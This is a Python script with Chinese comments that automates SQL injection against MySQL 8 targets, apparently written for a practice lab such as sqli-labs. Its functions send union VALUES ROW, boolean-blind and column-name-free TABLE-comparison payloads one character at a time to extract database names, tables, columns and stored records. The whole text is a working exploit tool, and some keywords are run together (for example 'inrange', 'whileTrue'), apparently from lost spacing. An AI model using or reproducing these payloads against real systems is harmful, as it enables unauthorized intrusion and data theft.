defcurrent_db(url): print("利用mysql8新特性或普通布尔盲注:\n1.新特性(联合查询) 2.普通布尔盲注") print("请输入序号:",end='') num = int(input()) if num == 1: payload = "-1' union values row(1,database(),3)--+"#联合查询爆当前数据库(可修改) urls = url + payload r = requests.get(url=urls) print(r.text) else: name='' payload = "1' and ascii(substr((database()),{0},1))={1}--+"#布尔盲注爆当前数据库(可修改) for i inrange(1,40): char='' for j in chars: payloads = payload.format(i,ord(j)) urls = url + payloads r = requests.get(url=urls) if"You are in"in r.text: name += j print(name) char = j break if char == '': break
defstr2hex(name): res = '' for i in name: res += hex(ord(i)) res = '0x' + res.replace('0x','') return res
defdbs(url):#无列名盲注爆所有数据库(可修改) whileTrue: print("请输入要爆第几个数据库,如:1,2等:",end='') x = int(input())-1 num = str(x) if x < 0: break payload = "1' and ('def',{},'',4,5,6)>(table information_schema.schemata limit "+num+",1)--+" name = '' for i inrange(1,20): hexchar = '' for char inrange(32, 126): hexchar = str2hex(name + chr(char)) payloads = payload.format(hexchar) #print(payloads) urls = url + payloads r = requests.get(url=urls) if'You are in'in r.text: name += chr(char-1) print(name) break
deftables_n(url,database):#无列名盲注爆数据表开始行数(可修改) payload = "1' and ('def','"+database+"','','',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)<(table information_schema.tables limit {},1)--+" for i inrange(0,10000): payloads = payload.format(i) urls = url + payloads r = requests.get(url=urls) if'You are in'in r.text: char = chr(ord(database[-1])+1) database = database[0:-1]+char payld = "1' and ('def','"+database+"','','',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)<(table information_schema.tables limit "+str(i)+",1)--+" urls = url + payld res = requests.get(url=urls) #print(i) if'You are in'notin res.text: print('从第',i,'行开始爆数据表') #判断开始行数 n = i break return n
deftables(url,database,n):#无列名盲注爆数据表(可修改) whileTrue: print("请输入要爆第几个数据表,如:1,2等:",end='') x = int(input())-1 num = str(x + n) if x < 0: break payload = "1' and ('def','"+database+"',{},'',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)>(table information_schema.tables limit "+num+",1)--+" name = '' for i inrange(1,20): hexchar = '' for char inrange(32, 126): hexchar = str2hex(name + chr(char)) payloads = payload.format(hexchar) #print(payloads) urls = url + payloads r = requests.get(url=urls) if'You are in'in r.text: name += chr(char-1) print(name) break
defcolumns_n(url,database,table):#无列名盲注爆字段开始行数(可修改) payload = "1' and ('def','"+database+"','"+table+"','',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22)<(table information_schema.columns limit {},1)--+" for i inrange(3000,10000): payloads = payload.format(i) urls = url + payloads r = requests.get(url=urls) if'You are in'in r.text: char = chr(ord(table[-1])+1) table = table[0:-1]+char payld = "1' and ('def','"+database+"','"+table+"','',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22)<(table information_schema.columns limit "+str(i)+",1)--+" urls = url + payld res = requests.get(url=urls) #print(i) if'You are in'notin res.text: print('从第',i,'行开始爆字段') #判断开始行数 n = i break return n
defcolumns(url,database,table,n):#无列名盲注爆字段值(可修改) whileTrue: print("请输入要爆第几个字段,如:1,2等:",end='') x = int(input())-1 num = str(x + n) if x < 0: break payload = "1' and ('def','"+database+"','"+table+"',{},'',6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22)>(table information_schema.columns limit "+num+",1)--+" name = '' for i inrange(1,20): hexchar = '' for char inrange(32, 126): hexchar = str2hex(name + chr(char)) payloads = payload.format(hexchar) #print(payloads) urls = url + payloads r = requests.get(url=urls) if'You are in'in r.text: name += chr(char-1) print(name) break
defdatas(url,table):#无列名盲注爆数据(可修改) whileTrue: print("请输入要爆第几个数据,如:1,2等:",end='') x = int(input()) y = x-1 num = str(y) if y < 0: break payload = "1' and ("+str(x)+",{},'')>(table "+table+" limit "+num+",1)--+" name = '' for i inrange(1,20): hexchar = '' for char inrange(32, 126): hexchar = str2hex(name + chr(char)) payloads = payload.format(hexchar) #print(payloads) urls = url + payloads r = requests.get(url=urls) if'You are in'in r.text: name += chr(char-1) print(name) break